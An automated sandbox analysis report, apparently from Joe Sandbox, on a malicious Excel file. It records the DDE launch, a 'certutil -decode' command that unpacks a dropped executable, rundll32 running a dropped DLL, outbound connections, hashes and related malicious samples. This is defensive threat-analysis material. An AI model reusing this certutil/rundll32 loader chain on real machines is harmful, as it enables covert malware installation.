Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS and NOOPENFILEERRORBOX

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Network Connect: 45.33.77.71 187
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Network Connect: 170.207.225.82 80
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Network Connect: 67.199.248.11 80

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00242FDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,RtlQueryPerformanceCounter,

4_2_00242FDE

Contains functionality to query windows version

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_10004383 GetVersionExA,GetSystemInfo,GetSystemMetrics,GetSystemMetrics,

5_2_10004383

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_0024339B cpuid

4_2_0024339B

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\rundll32.exe

Queries volume information: C:\ VolumeInformation

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
09:56:48	API Interceptor	1x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
09:56:48	API Interceptor	1x Sleep call for process: EXCEL.EXE modified from: 300000ms to: 100ms
09:56:49	API Interceptor	533x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms
09:56:52	API Interceptor	1x Sleep call for process: certutil.exe modified from: 60000ms to: 100ms
09:56:55	API Interceptor	1x Sleep call for process: rundll32.exe modified from: 30000ms to: 100ms
09:56:55	API Interceptor	1150x Sleep call for process: rundll32.exe modified from: 60000ms to: 100ms
09:57:15	API Interceptor	1x Sleep call for process: OUTLOOK.EXE modified from: 300000ms to: 100ms
09:57:15	API Interceptor	1x Sleep call for process: OUTLOOK.EXE modified from: 30000ms to: 100ms
09:57:25	API Interceptor	1x Sleep call for process: OUTLOOK.EXE modified from: 60000ms to: 100ms
09:57:34	API Interceptor	7x Sleep call for process: rundll32.exe modified from: 1800000ms to: 100ms
09:57:34	API Interceptor	6x Sleep call for process: rundll32.exe modified from: 10000ms to: 100ms

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Upcoming Events February 2018.xls	61%	virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
ipv4.google.com	0%	virustotal	Browse
www.janes.com	0%	virustotal	Browse
google.com	0%	virustotal	Browse
clients1.google.com	0%	virustotal	Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.11	RFQ.pdf	3cfc4a47958f4a9c8231f479048831c8889d406e55a4d26b801e8918f188fc54	malicious	Browse	bit.ly/2upCaCO
	Approval.pdf	3c26e22685ef05b549c3b7f200682e4f2352f8d94635c6a1436ca5545d4cc948	malicious	Browse	bit.ly/2jwf8Zy
	http://bit.ly/2DkIAH3		malicious	Browse	bit.ly/2DkIAH3
	http://bit.ly/2hunsoL		malicious	Browse	bit.ly/2hunsoL
	http://bit.ly/2Ft4uJi		malicious	Browse	bit.ly/2Ft4uJi
	APPROVE-DOC.pdf	df22d78e68756f176a075616913e8660ce623b0dcce4425365eb703490335100	malicious	Browse	bit.ly/2xBnulq
	Invoice-000456.pdf	21af534c09928e90eeb847ba594bb0861d71df434c15aabd49992c803c14a5a9	malicious	Browse	bit.ly/2iHzw9L
	CDoc414.pdf	8238259b2b053b39662058d9c23c3b38afd9d089889fed1bdf3e5400e570cabb	malicious	Browse	bit.ly/2zvCVeO
	flashUpdate.exe	e863545b815fe556e0d39fb0a8fc6eae7d116d0f169d6f3335b8f23b74adfc10	malicious	Browse	bit.ly/2DXEcPm
	http://bit.ly/2z23bAM		malicious	Browse	bit.ly/2z23bAM
	LPA_Teaser_$160MWaterFord_LP_Invitation.pdf	111ab88bd1b092401aa049fdd3d20478efdddbdb72e22dbce0f9e3254cb5d8e2	malicious	Browse	bit.ly/2EJWSBI
	j5b1xBDZoT.exe	b472203a21023e45a70684c51d088bee27e29772cba4521915e1e7e5e302514d	malicious	Browse	bit.ly/redir3352

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	RFQ.pdf	3cfc4a47958f4a9c8231f479048831c8889d406e55a4d26b801e8918f188fc54	malicious	Browse	67.199.248.10
	Cash Statement.pdf	8055b485521aa9d06f8521e095fc6dda1a8ffd3a9aad21ec0f5fd498205fe57a	malicious	Browse	67.199.248.10
	Approval.pdf	3c26e22685ef05b549c3b7f200682e4f2352f8d94635c6a1436ca5545d4cc948	malicious	Browse	67.199.248.11
	https://bitly.com/2ADBPis		malicious	Browse	67.199.248.10
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	67.199.248.10
	http://bit.ly/2DkIAH3		malicious	Browse	67.199.248.11
	Scan_0613.pdf	3a692c2a5dee3b4f44caefcb06ac70a5fe4db4dc894811eec4f2a30bc3330d01	malicious	Browse	67.199.248.10
	Swisscom-E-Mail-Adressen.doc	93a31f8dd3b6b354d8517891987ab0fdafa42baecf53d0cf144a0eba9ea707e5	malicious	Browse	69.58.188.40
	http://bit.ly/2hunsoL		malicious	Browse	67.199.248.11
	http://bit.ly/2Ft4uJi		malicious	Browse	67.199.248.11
	APPROVE-DOC.pdf	df22d78e68756f176a075616913e8660ce623b0dcce4425365eb703490335100	malicious	Browse	67.199.248.11
	http://bit.ly/2yImbDr		malicious	Browse	67.199.248.11
	Invoice-000456.pdf	21af534c09928e90eeb847ba594bb0861d71df434c15aabd49992c803c14a5a9	malicious	Browse	67.199.248.11
	CDoc414.pdf	8238259b2b053b39662058d9c23c3b38afd9d089889fed1bdf3e5400e570cabb	malicious	Browse	67.199.248.11
	DOC-9R949SAD2NUS991AA1234N57E9SD777843U54534.cmd	10a56591afa408ebf566e265f2bf0f3555e3e7288a103ef5f22ecea7c26b99f7	malicious	Browse	67.199.248.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	Emotet.doc	9e7a51d4c86a41a01d0e6bcac1c7720ebae68bb08b7840cad7f35003a0105527	malicious	Browse	173.230.145.224
	Emotet119.doc	81425c15025f0fe9f4314c0130b00fd974f4522eb622f030f613e7940111f8bf	malicious	Browse	173.230.145.224
	http://nikohsec.com/fax.php?afx153=samantha.myers@sonoco.com		malicious	Browse	176.58.107.178
	emotet.doc	6af5bfdcf4eb49bc637ccccaeea9c830f9e4812011e5efb1a5512eca5bdc7d57	malicious	Browse	64.62.228.170
	36messag.exe	8ae8ce82f26a356fbc9f3914df13f53b06f133c1e4018ff4592fda47e6ae392e	malicious	Browse	69.164.195.140
	http://cinetiux.com/LLC/?newinvoice01.doc		malicious	Browse	173.230.145.224
	http://newsletter.promostelefoniica.com/t/j-l-ohddhhl-yhdkkudtit-r/		malicious	Browse	45.79.77.20
	Invoices attached.doc	b01b4536b42112800c59916770b78df94bd5e860c2de228215e7d54f18e35be5	malicious	Browse	173.255.217.114
	EEYJ1-20229930926.doc	65ae5c0e9abc9f14e05db6ea1fd31c1b3a9a62e6b2e68f2355c00a02ef49ed2f	malicious	Browse	173.255.217.114
	http://www.mayflowerex.com/Sales-Invoice/		malicious	Browse	176.58.104.69
	faktura 5775747_PDF.js	95b7fe99c86fd526a250159eeda5f408cfb80fa7501efede4289628c64438142	malicious	Browse	176.58.123.25
	Invoice Number 64069.doc	4cabdde381330a3d91951513382f05825e9b1329f3133d0d4028279f2a5ff849	malicious	Browse	173.255.217.114
	57BL copy.exe	78d3d28498c3ae5b8e8818e42c67d15fbc321786f9438ea7932a81383951c2eb	malicious	Browse	45.56.68.98
	https://virtualadministrator.com/blog/		malicious	Browse	173.255.229.55
	uSUbynSM4.exe	2baf2a6cecf98c452c9a80e125a21273e688573f52db6389137f81e91a67e8a7	malicious	Browse	173.230.145.224
	13BMXTFVU.exeJQXLG.exe	8c41cf0b7a10fffa0f4086a16044dc23ba1011d8b2a9995ec7011c0e3f18eee7	malicious	Browse	72.14.182.233
	Outstanding Invoices.doc	4d31f25c4da2b05fbacc21035e0a2284be60e10ef103d3a1d412234717706550	malicious	Browse	173.230.145.224
	yxcLHdJwJq.exe	9e5f163d61582ac9e16cf9ae96c76bc420cea76c34aba50f54bb6a558dc7fdea	malicious	Browse	45.79.194.109
	49Order List.exe	aef4d513540180a040da1a8e6c43a67eac3d627236feec8ebe3aafade6d0c6c0	malicious	Browse	72.14.182.233
	Scan1782384.doc	6cf585b16de1edb9dc313886ddb4b32d617290eef1c9ce1a2ef6160336c1eaad	malicious	Browse	173.230.145.224
BITLY-AS-BitlyIncUS	Approval.pdf	3c26e22685ef05b549c3b7f200682e4f2352f8d94635c6a1436ca5545d4cc948	malicious	Browse	67.199.248.11
	https://bitly.com/2ADBPis		malicious	Browse	67.199.248.10
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	67.199.248.10
	http://bit.ly/2DkIAH3		malicious	Browse	67.199.248.11
	http://bit.ly/2hunsoL		malicious	Browse	67.199.248.11
	ddownload39.club		malicious	Browse	67.199.248.13
	http://bit.ly/2Ft4uJi		malicious	Browse	67.199.248.11
	https://buff.ly/2CQlDec		malicious	Browse	67.199.248.13
	APPROVE-DOC.pdf	df22d78e68756f176a075616913e8660ce623b0dcce4425365eb703490335100	malicious	Browse	67.199.248.11
	http://bit.ly/2yImbDr		malicious	Browse	67.199.248.11
	Invoice-000456.pdf	21af534c09928e90eeb847ba594bb0861d71df434c15aabd49992c803c14a5a9	malicious	Browse	67.199.248.11
	CDoc414.pdf	8238259b2b053b39662058d9c23c3b38afd9d089889fed1bdf3e5400e570cabb	malicious	Browse	67.199.248.11
	DOC-9R949SAD2NUS991AA1234N57E9SD777843U54534.cmd	10a56591afa408ebf566e265f2bf0f3555e3e7288a103ef5f22ecea7c26b99f7	malicious	Browse	67.199.248.11
	https://bitly.com/2ATuKu6		malicious	Browse	67.199.248.11
	SCANNER09-009873.pdf	4acd74b5eed8fb291e3a1e375edd0ccb58965bafeef0a29f0338a8ea11cc7dfc	malicious	Browse	67.199.248.10
	flashUpdate.exe	e863545b815fe556e0d39fb0a8fc6eae7d116d0f169d6f3335b8f23b74adfc10	malicious	Browse	67.199.248.11
	k7nRrhqfBd.exe	39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800	malicious	Browse	67.199.248.10
	setup_sex_game.exe	9c685e70f53b6b23a9cf45fcd10e46fa8fe2c68dfd62a8d2901100ba6cb9efcf	malicious	Browse	67.199.248.10
	http://bit.ly/2y6BB0B		malicious	Browse	67.199.248.10
	Cornerstone-Technologies Renewal.pdf	e1d94024d380380a1b7e1f4f8f6213de79f5e1f68f346364ffd00d4f0a4cb823	malicious	Browse	67.199.248.10

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\cdnver.dll	foo.exe	ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8	malicious	Browse

Screenshot

Startup

System is w7

EXCEL.EXE (PID: 3300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 716335EDBB91DA84FC102425BFDA957E)

certutil.exe (PID: 3388 cmdline: certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe MD5: 0D52559AEF4AA5EAC82F530617032283)

M4P9S1S3.exe (PID: 3412 cmdline: C:\Programdata\M4P9S1S3.exe MD5: 36524C90CA1FAC2102E7653DFADB31B2)

rundll32.exe (PID: 3432 cmdline: 'C:\Windows\System32\rundll32.exe' 'C:\Users\user\AppData\Local\cdnver.dll',#1 MD5: C648901695E275C8F2AD04B687A68CE2)

OUTLOOK.EXE (PID: 3688 cmdline: 'C:\PROGRA~1\MICROS~2\Office14\OUTLOOK.EXE' -c IPM.Note /m 'mailto:tchung@smi-online.co.uk' MD5: E8D2BEEE0809B48D1DF1B86252EDC0D3)

cleanup

Created / dropped Files

C:\ProgramData\M4P9S1S3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	133632
Entropy (8bit):	6.896267473423163
Encrypted:	false
MD5:	36524C90CA1FAC2102E7653DFADB31B2
SHA1:	8D6DB316EA4E348021CB59CF3C6EC65C390F0497
SHA-256:	FF808D0A12676BFAC88FD26F955154F8884F2BB7C534B9936510FD6296C543E8
SHA-512:	D18154C05209BA561F074D71520C9770DA603E649A39E96A807AE421280603C7D5B85BD0249808A9A683DB499BF1D793DC4951AE0E6EC717C0BD2C5E49F2B4CC
Malicious:	false
Reputation:	low

C:\ProgramData\M8N5M9S4.txt
File Type:	PEM certificate
Size (bytes):	178232
Entropy (8bit):	5.560882628071168
Encrypted:	false
MD5:	2361181C5D9A15EC3D5249DE1985B83D
SHA1:	364CD7C0E94C41551F1D73EFCDD00D4ABDD832D3
SHA-256:	0CAB912409CCD2A5D90FB82B02376A633EC09F1DCF33480720E35E9714068C2A
SHA-512:	0537D9F9413BD43247901AF2EE477BBC7AEA34635647BA8C87CCE4A253F198D228B5CDD39FB076E110FFF02E1E247A842C57A5E598669A37885F13B7D545F267
Malicious:	false
Reputation:	low

C:\Users\HERBBL~1\AppData\Local\Temp\outlook logging\firstrun.log
File Type:	diff output, ASCII text, with CRLF line terminators
Size (bytes):	143
Entropy (8bit):	5.019630405360648
Encrypted:	false
MD5:	F17A55BD9542681CE148867264F9BAFD
SHA1:	96B2C98BC829698060BA388CCF12FE0C7B8A9BA2
SHA-256:	5986C0DE698E38AE9BCEEFEE3084FFAAAED1CA64AAC32BCB8303717246339CEA
SHA-512:	248A967C1AEF80599F1DCC224FA0A058E6989FF581F95C88D043F1C3956273C5CDBBB9BFB0B56B064D5E29B19D263DF289D9ED882C14CF37944DEBFED7FCB1B8
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D
File Type:	data
Size (bytes):	325
Entropy (8bit):	6.512682424771716
Encrypted:	false
MD5:	011B3A990E7DF995AB19C2C7E0138EC4
SHA1:	48EDC142B62736B1F201C7B8AEC5A5756148A881
SHA-256:	7BA17E88926991CE83E0BBC0D86DD8F9DC69257D845C6649F3FCF7A7C6741AC6
SHA-512:	4714CA804839D536B2CC7D15FCBDA8FB9B76ABECD943C30F0739F476007821806E21CF4A3C202CF985140D1BCAF2843CF70943EB81DD42288FE182A12A786BE6
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
File Type:	Microsoft Cabinet archive data, 54018 bytes, 1 file
Size (bytes):	54018
Entropy (8bit):	7.995641550109988
Encrypted:	true
MD5:	06ED9A39AC55EB00DD78E416E1A804F6
SHA1:	270464D1618197D86FF89184BA5ED45708D38BD9
SHA-256:	298BBA62CAA0B61A402F715BB5B8D1D28ECD0B58D9A9B6B8AE7947B39DA8B1EB
SHA-512:	6A3A747BB754D9BFB78D18E37CD9806015E00EEE85C59E16E3FCB6263024B422BE94A83D4FD447912CC516A77B2D17A38689303857A40B75C2831A6548D63287
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_766B34AE9771D7C6A6B5C01F1CA544C4
File Type:	data
Size (bytes):	463
Entropy (8bit):	7.199746572747184
Encrypted:	false
MD5:	F9A003BF423F079719D5210EE1DA2553
SHA1:	9A5BE6B34A9E63C080F6625C201A8C4948C503C0
SHA-256:	9FE7638C14CF7B4BEE3F020B37DB92997AC61E5372B00D69E790990528BF1F7E
SHA-512:	799749DFD7BF23C35DD695707FEE956062C9B021303063DE4C49396D69B587C788B248556D0F1441BFB451B67583CBE75E2810B502484B21920F4B95335193C9
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56
File Type:	data
Size (bytes):	1391
Entropy (8bit):	7.535518130050401
Encrypted:	false
MD5:	E83C4A8EDC8D1355B429B8339D9EDD94
SHA1:	667AA3426D32B5752AAE2FD03A145434DCF5E74A
SHA-256:	776B93A5C26526DB02F1546BBF4911FB9C715D2C8840205BB188ABFDF03D3BBE
SHA-512:	62016AB01A00991EBBB7E03B65F6A575B282D03D10F6F0EA6583CA57B20BFAD2B36887978B98E994507BE6CCD11A8746782578F51A5B7C8C18B8871A03F29ADA
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8A574ED5927B3CEC9626151D220C7448
File Type:	data
Size (bytes):	596
Entropy (8bit):	6.983654516955271
Encrypted:	false
MD5:	50566A680E364FCA9CBB5009D6AA0F62
SHA1:	A8BC318337F99E7D803DC9363C162EE1FC73EFE4
SHA-256:	090E10C49EE9A1ACBF564DF17F0FD37A25907032CFD24F5DDF445EC470CDBD56
SHA-512:	0255FC1BF46E0D9011AB419C2E5B8CA0692928220BCE24C886592CCCAE421DD05C35F8FDC4539CE0760AEEDED1F1F3E43E6CDE3EAD40B599F8CB022B83531CE4
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D7B4E43171BB9E412497B0377F4343E7
File Type:	data
Size (bytes):	665
Entropy (8bit):	6.5260510573017125
Encrypted:	false
MD5:	6C125E02D863651466BAA987258AEF55
SHA1:	8843D11B8FACCDA1F92A6D3E2885CEF31F831C5E
SHA-256:	251BF6ED7A9C653CF8F99746E4731C50A2DE56C4CB7EAB369A87B7C51E0B3245
SHA-512:	7CD7201042311586451CE670A7FF0F924F58EB24C4E55CC1EC0D1B25DF7535712026F6C4E172003C94E9EA35974CA70B500A2888C5C8D113847909EFAA719730
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D
File Type:	data
Size (bytes):	584
Entropy (8bit):	3.305597097721307
Encrypted:	false
MD5:	795B8AAA7CDC293A79550981D5BF8FBD
SHA1:	4C8323BE3E094FEEC92B39211822C2C95E63CCD6
SHA-256:	5E28942273816A9AC4DA319EB07125106D561FA5D8479DD445312F15EC27EB4D
SHA-512:	B315C77F30BF1E5DFEEF8A302A719912AA4ADBE3A660CEB3FE6D2444AFF052DEAFFAB515B165B3247AC7E9EE74C7E54870933539D3704801F315F76C2646E79B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
File Type:	data
Size (bytes):	680
Entropy (8bit):	3.4169113544309635
Encrypted:	false
MD5:	AF8A5BE2713E42E8AA4AAC876830D356
SHA1:	B125B2EAE5E3CE3A733450CC6C963C5099F4D44C
SHA-256:	3A4004957711DBA75E0B0F79428FF9B1EB868CDB3917A3E9818FE72D4C25EF4A
SHA-512:	8FB86501A8EBEA7C354EA87C838A97169E357FA6C8E8E33D22AB2180EAB52B18C3106BD2055AA8B3BC0AB03D884890E682642E97E28FD855C1A18696E5E20CB3
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
File Type:	data
Size (bytes):	330
Entropy (8bit):	3.1400527259188067
Encrypted:	false
MD5:	DDDFE6FB944033341FF0BDBD03952DD8
SHA1:	D1CD7534F37983A64849FF64A3C6F6DC2AC7C3DE
SHA-256:	5591D71EF9D83B5E899723140B931ACA493F780FA5A79D9E4680C2711232362E
SHA-512:	2AE3C939D97EFBD1C5C99C3709765E0E722A9FC288CD0870571882986536737652AD0EF5ABE617FFEBF7A4675F0AACADF3D9FB04F5B75C8B678B0B6EF78D3CA1
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8059E9A0D314877E40FE93D8CCFB3C69_766B34AE9771D7C6A6B5C01F1CA544C4
File Type:	data
Size (bytes):	780
Entropy (8bit):	3.5852970350539297
Encrypted:	false
MD5:	16939B61BC7FFE3AA8D7546BC7E08C04
SHA1:	1873959AEA53627B382E757CBD4E6AE53B3B57BA
SHA-256:	0BBFE4B38F8149D2518D9833158368B1AB5CB251D41A50E5CB4BDB2B4AD0B452
SHA-512:	F5275BA0DCD6D82E5228C9B3ECBECBE8E7641131A8D3AC5C6B31C0704A2958D2CB3AC1DD86D15343D3A2B5010A28BDF0EE6E48A5C2B3E3FF418A81F176C6FD1C
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56
File Type:	data
Size (bytes):	768
Entropy (8bit):	3.75948437414568
Encrypted:	false
MD5:	DFC576A43C5A295A1F6D389DECB5CAFD
SHA1:	ABAD4F3439B9B3D73B213F9E40631C3AC0A37063
SHA-256:	50F0335BC2CE20E95731063A5470B5FD32B0758CB7FAAD350FDC9FC9C47CBEF8
SHA-512:	7D25B85FB1BB3AE68FB0D794B832951E1B044658E866D44371EB5DD174D51CC32EB7810A023D1C7D4D1A35EFB5C8100E5D7421BC70CA91016B063F04260A7BB2
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8A574ED5927B3CEC9626151D220C7448
File Type:	data
Size (bytes):	180
Entropy (8bit):	2.5925898084468995
Encrypted:	false
MD5:	7140825E10439BF1A28F19C71B3DB933
SHA1:	491049C692A5F06ED97330BEDD4580CBCAA6E652
SHA-256:	E215E0426199654C33013CCB58A8ADDD843AE732DFF43CCFB4FFE802EEE6F5CF
SHA-512:	40FB103905BD4F71C56A02EB90D4B99C6F2B5B340C1466907528C33ACB98C46D6C1FD357601F9C13BA17C49FD7BEC34B7DAB3BAA8EF84866082BF7E984517F2A
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D7B4E43171BB9E412497B0377F4343E7
File Type:	data
Size (bytes):	282
Entropy (8bit):	3.0632129038085343
Encrypted:	false
MD5:	6BA6442FAA2F66AFCA038F5D30C74B40
SHA1:	CC695C1B53BEEA43D5203F9E0C5E9138FEC51654
SHA-256:	075E74055383D20CE8CC24C77BBED887189548A962441246E08AA17524DDAB47
SHA-512:	1ADF8405E178171ACE9F01F5B638EF5BEF15D03101B6233D6C1788A7E710EAFFBB17091BCDD2E7585A761E4EE3F880892DE0B41C78D85BE0B7D0B7792D5EA905
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT
File Type:	data
Size (bytes):	3243996
Entropy (8bit):	4.397350207149245
Encrypted:	false
MD5:	E631E288F86FC03BEAEBD3503E9B13A0
SHA1:	96860D907ADACC344C48C26FC8487036C3F6A612
SHA-256:	B9AF0D742FC919BBB55F7493477A2154D41E501E814883BC8F60C3EA5478A207
SHA-512:	313B9F3CD9CE69CEE6B414B6CE677A5AB36D95B1C2D1F279AD32CD175A6B70CE17E638BD0385570CC3827C0C83AA3D09B85490E2350F0D1A807195BC3E991B9C
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Outlook\Outlook.sharing.xml.obi
File Type:	XML document text
Size (bytes):	185
Entropy (8bit):	4.778063671665198
Encrypted:	false
MD5:	D718E833258F1A5AA08685D6B3DABEAF
SHA1:	9E9839BBAF939924280764A2E7225A96A7B1E23D
SHA-256:	9A66131A4B8206F629BBB3BACCCA71788C8EC3838BE5B9D4898DE7ED18215779
SHA-512:	E397E2ACE31492CDA54CB24930739D5AF2915AD64370E1014A1A42B97A5B0D10A4A34FA173B8497C5D5D8256E7E71D9D9D263AA769C4CA40A490F94A9FAF6813
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Outlook\mapisvc.inf
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Size (bytes):	1122
Entropy (8bit):	3.5559421507431623
Encrypted:	false
MD5:	48DD6CAE43CE26B992C35799FCD76898
SHA1:	8E600544DF0250DA7D634599CE6EE50DA11C0355
SHA-256:	7BFE1F3691E2B4FB4D61FBF5E9F7782FBE49DA1342DBD32201C2CC8E540DBD1A
SHA-512:	C1B9322C900F5BE0AD166DDCFEC9146918FB2589A17607D61490FD816602123F3AF310A3E6D98A37D16000D4ACBBCD599236F03C3C7F9376AEBA7A489B329F31
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Outlook\~NEW~.sharing.xml.obi
File Type:	XML document text
Size (bytes):	185
Entropy (8bit):	4.778063671665198
Encrypted:	false
MD5:	D718E833258F1A5AA08685D6B3DABEAF
SHA1:	9E9839BBAF939924280764A2E7225A96A7B1E23D
SHA-256:	9A66131A4B8206F629BBB3BACCCA71788C8EC3838BE5B9D4898DE7ED18215779
SHA-512:	E397E2ACE31492CDA54CB24930739D5AF2915AD64370E1014A1A42B97A5B0D10A4A34FA173B8497C5D5D8256E7E71D9D9D263AA769C4CA40A490F94A9FAF6813
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\18GSS_Janes[1].htm
File Type:	HTML document, ASCII text
Size (bytes):	125
Entropy (8bit):	4.615617791014873
Encrypted:	false
MD5:	3F7F9023E44FC1B9F4C3DB7E845F5174
SHA1:	73C12A936AC0A350A7743387AB928DC8B4183BA7
SHA-256:	2F5513D72E40C61A834D45641006739CC1A8C5306BDDCCD208DD1196A6231427
SHA-512:	5F15ED0BB1D5D231B52708D25EACC431663BCB2368E7E2224BE0EA48795BB2AFE7EBF82757A75D9C3A0CAF18AD2EDB0E0F6F705FCEF01F9F0FDE1ED13780BF87
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\search[1].htm
File Type:	HTML document, ASCII text, with very long lines
Size (bytes):	129925
Entropy (8bit):	5.682170992272506
Encrypted:	false
MD5:	BC058BD87A7AA0AFD370F3EE60B466C6
SHA1:	CBC0D966B85F20F6E5B51AAF0FEF09423872964B
SHA-256:	77474FBAC055EA81B2F4FE9F393B5ACF937C0D2866D8A60F377B26F02C37A77B
SHA-512:	F6E8BF4F7BCFBAF5D425D6DA98E2E6239B3AA5CA2C29B8DFAF262FD5D44D0607A13E1B1024A98F98314670D54CC614BB2A1275C622820C9FE9153D592A1FED68
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\search[1].htm
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Size (bytes):	143522
Entropy (8bit):	5.81387528051116
Encrypted:	false
MD5:	89A2CDC4637E30FB4A7AA7C8A9047C07
SHA1:	43ADD8068364877BEC652449B543E0DC9F10F385
SHA-256:	1AC0D57B97AE8F5DFAC696B1632C5453FFCAB67926C109F819F7867B77C3D1D7
SHA-512:	90FE63DCE42DA18093C86535B6229A3DF2F94D9EB173050F5AA3812CAD7B30383E4B6961799586D2904096B8211499B6D1A1C239FDEF645420750B19FF5353B5
Malicious:	false

C:\Users\user\AppData\Local\cdnver.bat
File Type:	ASCII text, with no line terminators
Size (bytes):	72
Entropy (8bit):	4.720233384151408
Encrypted:	false
MD5:	E23202CE5A60ADDA0E580CF731BDF6E7
SHA1:	7CC7E35F2D9DBA26AD7FA820C069C2C9F29DEA5E
SHA-256:	2E70A620204EA6859A88A8C65F09C4F78529E2BC4DBAD3A139CD0FF420133FB3
SHA-512:	A14E3B85D2D39853CA5B028F42A2C075C62D1AB4FA39390F492EF5D3292A42CD240E4B1A5BF87031F04B7D5C0729E86CB166204DBD1A2B939C61EC57014C97C9
Malicious:	false

C:\Users\user\AppData\Local\cdnver.dll
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	31744
Entropy (8bit):	6.39747063815212
Encrypted:	false
MD5:	AA2CD9D9FC5D196CAA6F8FD5979E3F14
SHA1:	5BB9F53636EFAFDD30023D44BE1BE55BF7C7B7D5
SHA-256:	12E6642CF6413BDF5388BEE663080FA299591B2BA023D069286F3BE9647547C8
